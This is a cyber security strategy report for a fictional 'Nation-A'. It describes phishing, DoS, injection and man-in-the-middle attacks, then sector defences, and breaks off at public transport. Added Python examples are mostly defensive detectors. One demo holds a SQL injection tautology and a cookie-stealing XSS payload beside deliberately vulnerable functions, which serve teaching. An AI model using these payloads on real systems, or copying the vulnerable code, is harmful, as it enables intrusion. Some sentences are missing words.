
Nation-A Cyber Security Strategy
Developed by Joshua Fatehnia
4th May 2018
Version 1, ref 113524

Contents

1. Introduction ...... 2
1.1. Cyber Warfare ...... 3
2. Vision ...... 5
2.1. Threats ...... 5
2.2. Vulnerabilities ...... 7
3. Response ...... 13
3.1. Cooperative Involvement ...... 13
3.2. Prosecution and Forensic Computing ...... 13
3.3. Training and Education ...... 15
3.4. Government Assurance ...... 15
3.5. Redundancy Options ...... 16
4. Defence Plan Implementation ...... 17
4.1. Banking and Finance ...... 17
4.1.1. Attack Types and Recommendations ...... 20
4.2. Public Transportation ...... 22
4.2.1. Recommendations & Mitigations ...... 24
4.3. National Health Services ...... 26
4.3.1. Mitigations ...... 27
4.4. Public Utilities ...... 29
4.4.1. Mitigations ...... 31
4.5. Government Services ...... 32
4.5.1. Recommendations ...... 33
5. The Tallinn Manual ...... 36
6. Development ...... 37
6.1. Further Documents ...... 38
7. References ...... 40


1. Introduction

Cyberspace breaks down all physical communication barriers, allowing users to share information over a network regardless of the distance between them. This type of virtual environment was not designed with security at its forefront in its early stages; as the capabilities of cyberspace grew, no one could have imagined that this method of data transportation could be used for harmful purposes.

With the increasingly popular use of digital infrastructure in today’s society for the convenience of day-to-day operations, security is becoming a top priority for citizens and organizations. Managing the risks involved in the development of new products and services improves the confidentiality, integrity and accessibility of data, which is one of the top goals for many organizations operating on the .

This cyber strategy has been published to outline and protect the functioning of national and international foundations, promoting a secure, resilient and sustainable pathway for the economic values of this nation, while ensuring the confidentiality, integrity and accessibility of all user data and thereby the social well-being of the public. National security and resilience is not just the protection of government intellectual property but the protection of organizations operating within the nation; this plan will also act as a guidance paper for private organizations to better protect themselves against an attack.

The UK Government has recently stated that organizations that control critical computer system infrastructure shall be fined up to £17m if they do not have efficient and sufficient cyber security defences. Within this strategy, critical sectors have been identified, and organizations operating within those sectors shall be given the relevant information to secure themselves sustainably. (HMGOV-B, 2018)


1.1. Cyber Warfare

Cyber warfare is a new term, established before the first credited use of this type of warfare; it involves offensive and defensive operations targeting an opponent’s information systems and networks. There are many motives behind cyber-attacks, but they are typically placed into three categories: espionage, sabotage and propaganda. Although many more motivations can be identified for a cyber-attack, these are the three defined for international and political movements against a whole nation state. (LILY HAY NEWMAN 2018)

Using online visualisation tools such as Norsecorp and FireEye [Fig 1], it can be seen that multiple cyber-attacks happen simultaneously in real time all around the world; the image below also shows the top 5 targeted industries within the last 30 days.

[Figure 1]

Visualizing the number of attacks that take place on a daily basis demonstrates the threat that cyber-attacks pose to an infrastructure. It also becomes very challenging to differentiate what constitutes an ‘act of war’ within ‘cyber-warfare’ territory: attacks that are politically motivated by another state may indicate hostile activity, but in cases like Stuxnet, if no responsibility is taken by the actuating party, it becomes difficult to shift the blame onto another state. This is where documents like the Tallinn Manual come in to un-blur the lines between the two.


2. Vision

Our overall objective is to support national security and enable a well-functioning, self-sustaining society. The outcome of this strategy is to have a viable plan and solution against those who wish to compromise national security within the next 4 years. The fundamental pillars responsible for the functioning of society need to be protected in order to protect the nation dynamically: the number of organizations that reported they had suffered a security breach in the past year had risen from 25%, where 7/10 of these attacks involved a virus, or . (DR REBECCA KLAHR, 2016)

The primary missions are to:

- Defend all critical network, system and information infrastructures
- Prepare the nation’s capabilities to defend against a sizable cyber-attack from foreign actors
- Provide support and training to civilian personnel to bolster awareness, and provide an early-learners programme for the development of future generations

2.1. Threats

Many potential threats have proved to have different attack dynamics; therefore certain groups and individuals need to be identified in order to prepare an effective defence against them. (HMGOV, 2016)

- Cyber criminals: one of the most common and broadest threat identities. The main objective of this group is to develop malware or viruses to hack and steal sensitive data for financial gain, or to deliberately cause damage to systems in aid of their personal goals. Security defence mechanisms devised to mitigate some of these are described in the Defence Plan Implementation section [4] of this report.
- State and state-sponsored attacks: the penetration of a network with motives of political, diplomatic, technological, commercial and strategic advantage, with primary focus on the government, defence, finance, energy and telecommunication sectors (HMGOV, 2016). This type of threat is widely regarded as ‘cyber-warfare’, because the attack is commonly initiated from foreign sources. Typically, attacks with this motive have been state sponsored; for example the Stuxnet worm, which managed to infiltrate Iran’s nuclear infrastructure and sabotage its nuclear operations, was suspected to have been carried out by US and Israeli operatives, but this has not been confirmed by either party, so it cannot be regarded as an ‘act of war’. (Schmitt, 2013) (Caso, 2014)
- Terrorists: the war against terrorism is nothing new and, as expected, terrorism is becoming more sophisticated and advanced in step with new developments in technology. Although traditional terror methods still need to be addressed, a new dynamic of cyber terrorism needs to be prepared for. (ENISA, 2017)
- Hacktivists: usually independent individuals or small groups who look to breach networks and expose information, typically for personal or societal interests. The nature of their attacks is mainly to cause disruption for organizations or governments and rarely to cause actual harm; however, these threats are not negligible because of the massive danger of losing reputation and reliability in the consumer market. (Ludlow, 2013)
- Subordinates: trusted employees within a business or organization are often the most dangerous threat because of the rights and privileges some employees hold, which can bypass all the security measures in place to deter outside attackers. Background checks and ongoing surveillance can mitigate the risk of employees acting maliciously; however, more often than not, employees compromise their data unknowingly, having been manipulated into carrying out actions they believe are harmless. This is part of social engineering and is explained further in the Vulnerabilities section [2.2].


2.2. Vulnerabilities

Many vulnerabilities are discovered only once they have already been exploited: “99% of exploited VBTs were compromised more than a year after the VBT was published on the internet” (Verizon, 2015). Some of the most common attack vectors are listed below.

- Social Engineering

Social engineering is unlike any other “tool” or method of gaining information, and even access, into computer systems: it relies on the attacker interacting with the people involved in the target network. Vital information can be gained this way, including but not limited to topology, IP addresses, passwords, permission structures and computer details. Social engineering has been around for centuries and is essentially a “con game” in which victims are manipulated into indirectly revealing details to an attacker without even realising it. The best-known example of a social-engineered attack is the Trojan horse used in the siege of Troy, where the Greeks were manipulated into thinking the horse was a sacred gift left behind by the attackers, unaware that it contained a squad of elite soldiers who were thereby placed within the walls. (Rouse .M, 2014) (Peters, 2015)

- Social Engineering (Phishing)

This type of social engineering attack targets many individuals at once, getting them to unknowingly enter their valid credentials into a malicious website when they are under the impression that they are entering their information into the legitimate website. This works because the attackers have copied or ‘spoofed’ the real website to trick the users. There are several different types of phishing attack:

o Spear phishing is an attack created and targeted towards specific individuals, usually using information gathered ahead of time: if attackers can establish that an individual is a member of an organization, that individual can be targeted with an attack that leads them to believe it comes from that organization.

o Clone phishing is an attempt to rewrite, copy or clone a message that the victim received from the legitimate source moments before, but embedded with malicious URLs and attachments that trick the victim into clicking them.

There are a multitude of ways an attacker can dupe their victims; some typical examples are:

o Link spoofing: copying the legitimate link with minor, barely noticeable changes. It is always advisable to check the link before being redirected to another website.

o Website spoofing: usually done hand in hand with cross-site scripting, this is where a website is made to look as authentic as the legitimate site, even as far as changing the URL.

o Redirecting: this type of attack is carried out through no fault of the victim. When a user clicks on a legitimate website URL, the URL can be correct, yet the website has already been compromised and injected with malicious redirect code that sends the user to the malicious website without their knowledge.
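As an added illustration (not from the original strategy), the following Python applies the link checks recommended above to a constructed HTML message: it flags visible text that names a different host than the destination, lookalike spellings of a trusted host, and trusted names buried in another domain. The trusted host list and the sample message are assumptions.

```python
"""Checking links in a message for the spoofing tricks described above:
text that names one host while the href goes to another, hostnames that are
a lookalike of a trusted one, and trusted names embedded in another domain."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organisation actually uses (constructed for this example).
TRUSTED_HOSTS = {"example-bank.com", "login.example-bank.com"}

# A few characters commonly used to imitate ASCII letters (not exhaustive).
LOOKALIKE_CHARS = {"0": "o", "1": "l", "3": "e", "5": "s",
                   "\u0430": "a", "\u0435": "e", "\u043e": "o"}

# A hostname written out in the visible link text, with or without a scheme.
HOST_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})")


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(value):
    """Lower-cased hostname of a URL with any leading 'www.' removed."""
    return (urlparse(value).hostname or "").removeprefix("www.")


def _edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_link(href, text):
    """Return 'mismatch', 'ok', 'lookalike' or 'unknown' for one link."""
    dest = _host(href)
    shown = HOST_IN_TEXT.search(text.lower())
    if shown and shown.group(1).removeprefix("www.") != dest:
        return "mismatch"        # the text advertises a different host than the href
    if dest in TRUSTED_HOSTS or any(dest.endswith("." + t) for t in TRUSTED_HOSTS):
        return "ok"
    folded = "".join(LOOKALIKE_CHARS.get(ch, ch) for ch in dest)
    for trusted in TRUSTED_HOSTS:
        if folded == trusted or _edit_distance(dest, trusted) <= 1 or trusted in dest:
            return "lookalike"   # homoglyph, typosquat, or trusted name inside another domain
    return "unknown"


def scan_html(message):
    """Classify every link in an HTML message; returns (href, text, verdict) triples."""
    parser = _LinkCollector()
    parser.feed(message)
    return [(href, text, classify_link(href, text)) for href, text in parser.links]


# Constructed sample message, not a real phishing email.
SAMPLE_EMAIL = """
<p>Please <a href="https://login.example-bank.com/">sign in</a> to review your statement.</p>
<p>Having trouble? <a href="http://examp1e-bank.com/login">Log in here</a> instead.</p>
<p>Your documents: <a href="https://example-bank.com.secure-docs.net/x">view</a></p>
<p>Unsubscribe: <a href="https://mailer.example.org/u">https://example-bank.com/unsubscribe</a></p>
<p>News: <a href="https://news.example.org/">here</a></p>
"""

if __name__ == "__main__":
    for href, text, verdict in scan_html(SAMPLE_EMAIL):
        print(f"{verdict:10} {href}  ({text!r})")
```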

- Web Attacks (Denial of Service)

A denial of service attack, in simple terms, is where an individual or organization is overloaded with packets, resulting in a loss of the services they would normally expect to have. Typically, the desired outcomes are to disrupt a service and to damage relations between the consumer and the business; although that is the main purpose, there are also ways of stealing data in the process. (Rouse. M [B], 2007)

Some of the common attacks are:

- Buffer overflow attacks

o This type of attack occurs when a system tries to hold and process more data than has been allocated in its memory; by doing this, it allows regular code to be replaced by malicious code stored in known areas of the system. The Morris worm and the Heartbleed bug were two examples of this exploit. (MURAT BALABAN, 2013)

- SYN attacks

o A synchronize attack, most commonly known as a SYN flood, is intended to shut down and disrupt services by flooding the system’s critical functions with a multitude of high-rate SYN packets. It takes advantage of the three-way handshake process by flooding the TCP ports used to connect to the target; while this happens, the target system waits for an acknowledgement of each connection that never arrives, and it is typically overwhelmed with incomplete connections. (Susan Evans, 2005)

- Smurf attacks

o In this type of attack, an attacker sends PING requests to the broadcast address of a computer network; by doing this, all the hosts on that particular subnet receive the ICMP packet and send a reply, usually to the spoofed IP address of the victim. Done on a large scale, the victim’s computer systems are overloaded with replies and, more often than not, the intended system is shut down. (Vangie Beal, 2009)
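To show what the two flooding patterns above look like from the defender's side, this added example (not part of the original document) counts incomplete TCP handshakes per source and ICMP echo requests aimed at a subnet broadcast address in a constructed packet log; the addresses, ports and alert threshold are assumptions.

```python
"""Spotting the two flooding patterns described above in a packet log:
SYN floods (handshakes that never complete) and smurf attacks (ICMP echo
requests aimed at a subnet broadcast address on behalf of a spoofed victim)."""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    ts: float
    proto: str          # "tcp" or "icmp"
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    flags: str = ""     # TCP: "S", "SA", "A"; ICMP: "echo-request" / "echo-reply"


def half_open_by_source(packets):
    """Per client address, count TCP handshakes where a SYN was seen but the
    client's final ACK never arrived: the incomplete connections a SYN flood
    leaves on the target."""
    pending = {}                                   # (client, server, client port)
    for p in packets:
        if p.proto != "tcp":
            continue
        if p.flags == "S":                         # client -> server opens the handshake
            pending[(p.src, p.dst, p.sport)] = True
        elif p.flags == "A":                       # client -> server completes it
            pending.pop((p.src, p.dst, p.sport), None)
        # "SA" (server -> client) does not change the half-open state either way
    return dict(Counter(client for client, _, _ in pending))


def syn_flood_sources(packets, threshold=5):
    """Addresses with at least `threshold` half-open connections; spoofed SYN
    sources show up here as addresses that never answer the SYN/ACK."""
    return sorted(src for src, n in half_open_by_source(packets).items() if n >= threshold)


def smurf_victims(packets, subnets):
    """Count ICMP echo requests sent to a directed-broadcast address, grouped by
    the source they claim, which is the victim that will receive every reply."""
    broadcasts = {ip_network(s).broadcast_address for s in subnets}
    hits = Counter()
    for p in packets:
        if p.proto == "icmp" and p.flags == "echo-request" and ip_address(p.dst) in broadcasts:
            hits[p.src] += 1
    return dict(hits)


# Constructed sample traffic (not a real capture). 192.0.2.0/24 is the
# monitored LAN, 192.0.2.10 a web server, 203.0.113.9 the flooding source.
SAMPLE = [
    # a normal client completes the three-way handshake
    Packet(0.0, "tcp", "198.51.100.7", "192.0.2.10", 51000, 443, "S"),
    Packet(0.1, "tcp", "192.0.2.10", "198.51.100.7", 443, 51000, "SA"),
    Packet(0.2, "tcp", "198.51.100.7", "192.0.2.10", 51000, 443, "A"),
]
for i in range(6):  # a burst of SYNs from one address, never acknowledged
    SAMPLE.append(Packet(1.0 + i * 0.01, "tcp", "203.0.113.9", "192.0.2.10", 40000 + i, 443, "S"))
    SAMPLE.append(Packet(1.005 + i * 0.01, "tcp", "192.0.2.10", "203.0.113.9", 443, 40000 + i, "SA"))
SAMPLE += [
    # echo requests to the LAN broadcast address, claiming to come from the victim
    Packet(2.0, "icmp", "198.51.100.7", "192.0.2.255", flags="echo-request"),
    Packet(2.1, "icmp", "198.51.100.7", "192.0.2.255", flags="echo-request"),
    Packet(2.2, "icmp", "198.51.100.7", "192.0.2.255", flags="echo-request"),
    Packet(2.3, "icmp", "192.0.2.20", "192.0.2.10", flags="echo-request"),  # ordinary ping
]

if __name__ == "__main__":
    print("half-open per source:", half_open_by_source(SAMPLE))
    print("SYN flood sources:", syn_flood_sources(SAMPLE))
    print("smurf victims:", smurf_victims(SAMPLE, ["192.0.2.0/24"]))
```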

- Web Attacks (Website code)

One of the most common access points that attackers use is an organization’s corporate website, because it can be accessed from anywhere around the world, which commonly makes it the most vulnerable part of the network. Some examples of different web attacks are listed below (https://www.rapid7.com/fundamentals/types-of-attacks):

o SQL injection: Structured Query Language (SQL) is a programming language developed to manipulate database data; typically, when a user enters information on a website to be passed through to the database, it is stored and entered into the database using this language. The attack works by injecting malicious code into these inputs in a way that manipulates the system into processing the malicious code in areas where it can do damage; the injected code can allow attackers to do a number of things, including stealing data and creating a backdoor. (Ping. C, 2017)

o Cross-site scripting (MAURYA, S., 2015) is where an attacker is able to run their malicious code, already injected into a legitimate website, on an unsuspecting victim’s machine; depending on the payload, it could be used to allow remote root access to the victim’s machine, to access saved cookies to steal credentials from the victim’s machine, and much more. Typically, the victims are socially engineered into visiting the infected websites using ‘click-bait’ links so that the code runs on their machines.
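As an added example that is not from the original document, the following Python shows the SQL injection and cross-site scripting cases above as the vulnerable way of handling user input beside the hardened way, using an in-memory SQLite table with constructed users.

```python
"""The SQL injection and cross-site scripting cases above, shown as the
vulnerable way of handling user input next to the hardened way."""
import html
import sqlite3


def open_demo_db():
    """In-memory database with one constructed user table (sample data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "correct horse"), ("bob", "hunter2")])
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """String formatting: the input becomes part of the SQL statement itself,
    so quote characters in it change what the query means."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in con.execute(query)]


def login_hardened(con, username, password):
    """Parameterised query: the driver passes the values separately from the
    statement, so the input can only ever be compared as data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(query, (username, password))]


def render_vulnerable(comment):
    """Reflecting user-supplied text straight into HTML lets a script tag execute."""
    return "<p>%s</p>" % comment


def render_hardened(comment):
    """Escaping '<', '>', '&' and quotes turns the same text into inert markup."""
    return "<p>%s</p>" % html.escape(comment, quote=True)


if __name__ == "__main__":
    con = open_demo_db()
    probe = "' OR '1'='1"    # the textbook tautology: makes the WHERE clause always true
    print("vulnerable:", login_vulnerable(con, "alice", probe))  # every user, no password needed
    print("hardened:  ", login_hardened(con, "alice", probe))    # nothing matches
    payload = "<script>alert(document.cookie)</script>"
    print(render_vulnerable(payload))   # script tag survives into the page
    print(render_hardened(payload))     # shown as text, not executed
```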

- Communication (Man in the Middle)

Man-in-the-middle attacks are typically used to eavesdrop on end-to-end communication, which can be an efficient method of stealing important information as it is communicated. Once man-in-the-middle persistence has been established, information can also be altered to manipulate the users or systems involved. Some of the different types of MITM attack include the following (Rapid7, 2000):

o A rogue access point can be set up by an attacker to trick nearby devices into joining its network. Most devices are configured to auto-join the network with the strongest signal; although this can be disabled depending on the device, a user can unknowingly connect to a rogue access point, meaning that the victim’s network traffic can be monitored. As already mentioned, this type of MITM attack can be mitigated by turning off the Wi-Fi auto-join feature on the device.

o ARP spoofing is used by an attacker to associate their own MAC address with the IP address of a host on the target LAN, with the result that traffic destined for the legitimate host is sent to the machine with the spoofed address instead; this is typically done by sending Address Resolution Protocol (ARP) messages over the LAN that claim the target IP address. The risk of ARP spoofing can be minimized by using packet filtering across the network and by using ARP spoofing detection software, which can identify traffic that appears to be spoofed.
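An added example of the ARP spoofing detection mentioned above (not the document's own code): a watcher that records which MAC answers for each IP and alerts when that changes, or when one MAC ends up claiming several IPs, run over constructed ARP replies. The addresses and the pinned gateway binding are assumptions.

```python
"""A small ARP-spoofing detector of the kind referred to above: it watches ARP
replies on a LAN and raises an alert when the MAC address answering for an IP
changes, or when one MAC address ends up answering for several IPs."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float
    sender_ip: str
    sender_mac: str


class ArpWatch:
    def __init__(self, static_bindings=None):
        # Bindings the administrator has pinned (e.g. the gateway); these are
        # never updated from traffic, only alerted on when contradicted.
        self.table = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}
        self.static = set(self.table)
        self.alerts = []

    def observe(self, reply):
        """Update the IP-to-MAC table from one reply; return an alert tuple or None."""
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac          # first time this IP has been seen
            return None
        if known == mac:
            return None                   # consistent with what we already know
        kind = "static binding contradicted" if ip in self.static else "mac changed"
        alert = (reply.ts, ip, known, mac, kind)
        self.alerts.append(alert)
        if ip not in self.static:
            self.table[ip] = mac          # follow the new claim, but it has been alerted on
        return alert

    def duplicate_macs(self):
        """MACs currently answering for more than one IP, typical of a host that
        impersonates the gateway while keeping its own address."""
        by_mac = defaultdict(set)
        for ip, mac in self.table.items():
            by_mac[mac].add(ip)
        return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed sample of ARP replies seen on 192.0.2.0/24 (not a real capture).
GATEWAY = {"192.0.2.1": "aa:bb:cc:00:00:01"}
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.0.2.20", "aa:bb:cc:00:00:20"),
    ArpReply(0.5, "192.0.2.30", "aa:bb:cc:00:00:30"),
    ArpReply(1.0, "192.0.2.40", "aa:bb:cc:00:00:40"),
    ArpReply(5.0, "192.0.2.1", "aa:bb:cc:00:00:30"),   # .30's MAC claims the gateway's IP
    ArpReply(5.2, "192.0.2.40", "aa:bb:cc:00:00:30"),  # .30's MAC also claims .40
    ArpReply(6.0, "192.0.2.20", "aa:bb:cc:00:00:20"),  # unchanged, no alert
]


def run_sample():
    """Feed the sample through the watcher; returns (alerts, duplicate MAC map)."""
    watch = ArpWatch(GATEWAY)
    for reply in SAMPLE_REPLIES:
        watch.observe(reply)
    return watch.alerts, watch.duplicate_macs()


if __name__ == "__main__":
    alerts, dups = run_sample()
    for alert in alerts:
        print("ALERT", alert)
    print("MACs answering for several IPs:", dups)
```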

There are a few different methods for carrying out MITM attacks:

o Attackers can use packet sniffing tools like Wireshark and PacketSniff to view incoming and outgoing packets on a particular network interface; this is fairly low level and requires root access to the interface. Attackers can also inject their own malicious packets into the communication stream.

o Attackers may read user data sent between a victim and a web server to hijack the session by stealing the session cookie. The session cookie is created so that the user can access all the web pages on the server without having to log in each time; if an attacker can get hold of it using a man-in-the-middle attack, they can act as the target victim.

o SSL stripping is used when an attacker is already waiting for a request from a victim’s machine and alters the response from the server to direct the victim to an HTTP page instead of HTTPS. Depending on the scope of the attack, if the user enters login credentials on the HTTP page, they can be intercepted by the attacker because of the weaknesses of plain HTTP.


MITM has been around for a long time, and certain preventative measures have been developed to mitigate the risk of this attack (RICKY PUBLICO, 2017):

o Secure/Multipurpose Internet Mail Extensions (S/MIME) has been developed to make sure that emails are fully encrypted in transit and near impossible to read if intercepted.

o Communication with authentication certificates ensures that, in an SSL handshake, only those who have been authenticated by a certificate are able to access the information on the server; the server will only recognise valid client certificates.

o HTTPS was developed by Netscape Communications in 1994 and formally used in 2000. It was implemented to upgrade the existing HTTP protocol, which made no use of a secure SSL/TLS channel and certificates, and it allows a secure communication channel between the end user and the web server.


3. Response

3.1. Cooperative Involvement

Partnerships are to be investigated to help shape the global cyber environment, give a wider and more expansive view of cyber threats, and share expertise. Market forces are to be supported to raise cyber standards, working with the public and private sectors to ensure that individuals, businesses and other organizations can adopt the appropriate behaviours.

Alongside working with other nation states to develop cyber knowledge, it is important that there is a cooperative movement within the country’s industries themselves. Organizations are encouraged to work with Internet Service Providers (ISPs) and Cloud Service Providers (CSPs) to make it harder to attack the virtual infrastructure of Nation-A; this can also encourage local governments to scale up cyber protection campaigns that promote support for smaller organizations.

3.2. Prosecution and Forensic Computing

It can be very difficult, firstly, to identify the individuals or parties responsible for an attack and, secondly, to find the evidence to support the prosecution of those individuals.

Different techniques are adopted, using tools developed to track and find the source of certain traffic; these all depend on the type and size of the attack, along with the forensic data collected. It is important to analyse the bigger picture correctly and not just the isolated event, as it is very likely that the attack was planned over a period and several reconnaissance methods were used to collect the relevant information. With sophisticated attacks, finding the digital footprint of the attackers is usually impossible if they have taken the appropriate steps to avoid being tracked. (Glance 2015)

Fileless attacks offer an attacker a pathway into a system while remaining undetectable; it is likely that this type of attack is used for state and state-sponsored interests because of its sophistication and the importance of anonymity. (ENISA, 2018)

The first thing that needs to be established when trying to trace an attack is where the piece of malware has ended up and which vulnerabilities were used to gain access into the network, assuming that the target network was breached; for other attacks, such as DDoS and non-penetrative attacks, the target of the attack will still need to be identified. The following is a list of some of the typical entry points that could be used to get into a target network (Rapid7, 2000):

- Malware
  o CD/DVD
  o USB
  o Email attachment
  o Internet downloads
- Phishing
  o Emails
  o Phone calls
  o Letters
  o Web popups
- Web attacks
  o SQL injection
  o Cross-site scripting
  o Denial of service
  o Session hijacking

When the entry point has been established, it can be easier for the authorities to identify how that particular vulnerability was exploited, whether it was an employee downloading an attachment or part of the network having been compromised, by looking at log entries, emails sent and Wireshark captures to see if there are any leads. If the attack was sophisticated enough there may be nothing left behind; however, knowing the cause can be beneficial for the victim in acting appropriately to prevent the same thing happening again.


3.3. Training and Education

Training and educating the newer generation in cyber defence is extremely important in terms of creating a sustainable environment. According to the Security Breaches Survey undertaken in the UK, “Just under a 5th of businesses had their staff partake in cyber security training this year” (DR REBECCA KLAHR, 2016); this figure needs to be drastically increased to aid cyber awareness and improve employee practice.

3.4. Government Assurance

The Government is to distribute a plan for equipment distributors to ensure that all their equipment is ‘secure by default’. This is to ensure that when an organization purchases information system equipment, it already arrives secure and proactively ensures that the user changes the default settings to harden the devices; this can involve:

- Setup wizards to customize passwords (SSH, console, administrator, …)
- Notification of out-of-date software
- Notification of out-of-date hardware

According to the Cisco 2016 Annual Security Report, 115,000 Cisco devices were shortlisted and then analysed, which revealed that 106,000 of those devices were running old software with known vulnerabilities. (Cisco, 2016)

New market products are to be monitored and examined to add ‘security ratings’ to each; this can be a good comparative indicator for potential customers.

It is vital that governments distribute the best cyber security practices, underpinning the core functionality that organizations seek to adhere to under the same policies. Government systems hold large quantities of sensitive data, and extra precautions need to be taken:

Objectives

- Establishing confidence in using services
- Expiration of legacy systems
- Public access rights
- Adherence to cyber security standards and regulations

Approach

- Online infrastructure
- Ongoing funding for system hardware
- Increased cyber awareness training
- Threat analysis for new technologies

3.5. Redundancy Options

For a stable and progressive economic environment, it is vital that organizations within each sector work towards having a plan to fall back on when dealing with threats; without these redundancy options, it is difficult for the nation to move forward together.

Like individual organizations, the nation itself requires a collective redundancy plan in the event of a total breakdown of internal services. With the likelihood of future wars being conducted on cyber platforms (MACASKILL, E., 2018), Nation-A needs to ensure that effective redundancy is in place in case of an attack from another state.


4. Defence Plan Implementation

4.1. Banking and Finance

Internet banking fraud is a growing problem that needs to be addressed within today’s society; fraud within this sector grew by 64% to £133.5m in 2015, with the growing trend of targeting a smaller number of large, high-end, high-net-worth businesses becoming extremely popular because of the pay-out. (HMGOV, 2016)

Ovum conducted a study of the predicted spend allocation for ICT services within the banking sector; it was predicted that the top 1,000 retail banks in the US would spend $124b on ICT functions, with the top 10 accounting for $3.1b of that share (Daniel Mayo, 2017). Also shown is the allocation of spend by the top 1,000 for each business function, with security and fraud management being among the top 3 biggest expenditures in that sector of the business. This study is a big indicator of where security and fraud detection should be placed when prioritizing different functions.

[Figure] (Daniel Mayo, 2017)


Large banking and finance organizations are now creating a larger digital presence, with many of their services moving online, and the transfer of sensitive data over the internet is becoming more common. Currently, most internet banking providers are digitally sound, knowing that a data breach and the loss of data could be catastrophic. Research from Ovum expected US banks to become more aware of the problem and consequently raise their IT security budgets by 4.3% (Penny Crosman, 2014) compared to the year before; Ovum had also surveyed up to 500 different banking firms about their priorities for the next 18 months, and the 2 most commonly shared interests were mobile banking and online banking.

[Figure] (Penny Crosman, 2014)


As already mentioned, organizations within the banking and finance sector must pay particular attention to digital security because of the amount of confidential data being handled; many of the methods used to gain access into a network and manipulate data require a certain degree of social engineering [2.2]. There must also be a primary focus on employee practice to prevent data breaches due to human error, which is the most common cause of data breach incidents: 90% of recorded attacks had been initiated through some form of employee intervention. (Institute, IM 2016)

Some of the most common ways hackers gain valuable information through unaware employees include, but are not limited to:

- Phishing
- Fake emails
- Physical entry (USBs, CDs, DVDs)
- Downloads

In many of these cases, the risk can be mitigated with thorough employee training and examples of good practice; if employees have been made aware of these types of attack, it is likely that most of them will avoid these behaviours. This is especially critical within the banking and finance sector, as this may be the only way someone can initiate an attack, given the heavy investment in online security.

Cornerstone’s benchmark study revealed that businesses were spending 29% more on fraud detection in 2014 than in the previous year; this is due to the massive influx of payments made without the physical card to hand. (Cornerstone Advisors, 2014)

The same study also collected information on the types of interaction services offered to customers in 2013 compared with 2010. The figure shows a rise in secure personal chats and a reduction in ‘open to all’ information; because of restrictions on the use of social media and third-party communication services, consumers feel much more comfortable chatting directly with the vendor.


[Figure] (Cornerstone Advisors, 2014)

With these types of communication method becoming more popular, organizations need to set aside more of the security budget to ensure that these channels are as secure as possible and that the information being transferred cannot be read by foreign users.

4.1.1. Attack Types and Recommendations

As mentioned before, gaining access into a bank’s network and being able to compromise data or steal resources is nearly impossible without planning and reconnaissance beforehand. Examples like the Bangladeshi online ‘bank heist’, where just over $100 million was stolen from the bank, demonstrate the amount of planning that went into successfully initiating the attack. Firstly, the attack was carried out using legitimate SWIFT credentials and legitimate transfers to avoid arousing suspicion, and malware had been installed on the relevant machines to avoid the detection of suspicious activity (Kim Zetter, 2016). This was not a traditional ‘hack’ but involved various stages leading up to the attack; installing the malware and getting hold of the credentials would have involved the cooperation of employees. It was indicated that, at the time, the bank’s networks did not have firewalls, which raised the possibility of a breach and thus allowed the hackers to install the malware that stopped the SWIFT transaction records from being automatically printed, which allowed the transfers to go undetected until later on.

Vulnerabilities in this case were:

- Inability to prevent malware from being installed onto systems
- Inability to detect malware that had been installed onto systems
- Lack of staff background checking
- Lack of good employee practice and training

Recommended improvements:

- Implementation of a hardened firewall
- Updated anti-virus
- IDS/IPS implementation
- Thorough background checking and training

It is not only employees who need to be aware: attackers may target high-value individuals or carry out a large-scale attack on groups of customers to steal individual account data. This is largely done using social engineering to manipulate the user into unknowingly giving away their login credentials to a fake source.

Phishing attacks are widely used in this sector, as mentioned; some of the steps that can be taken to minimize these risks include:

- Relevant awareness and training for employees and the general public
- Removal of all incoming files, ensuring that they are inspected before being made available to download
- Filtering

Lucy Security’s simulation is a testing and simulation platform that allows users to create their own scenarios and respond appropriately to the individual threats it offers; it is a unique tool that can be used by organizations of all sizes to test their resilience against cyber threats, both on the network and in employee practice. Multiple campaigns can be set up simultaneously, allowing the admin to check the progress of each one without interrupting another campaign (OLIVER, 2015); network administrators may use the tool to test relevant computer systems and employees.


4.2. Public Transportation

The public transportation industry is one of the most underrated when considering cyber security. Previously, its infrastructure was built upon closed and easily manageable systems where only selected users had access to the closed networks; this has resulted in poorly managed foundations that are now moving towards a more digitalized and ‘smart’ way of travelling, which is not sustainable.

With the recent digitalization and connectivity of transportation services, these services are becoming susceptible to attack, and many nation states are reacting by developing their defences in order to increase stability. ABI Research reports an increase in cybersecurity spending on transportation in the USA, with operational spend increasing from $8 billion to $14 billion by 2022 to embrace the modernization of all services across the board within this industry. (API Research, 2017)

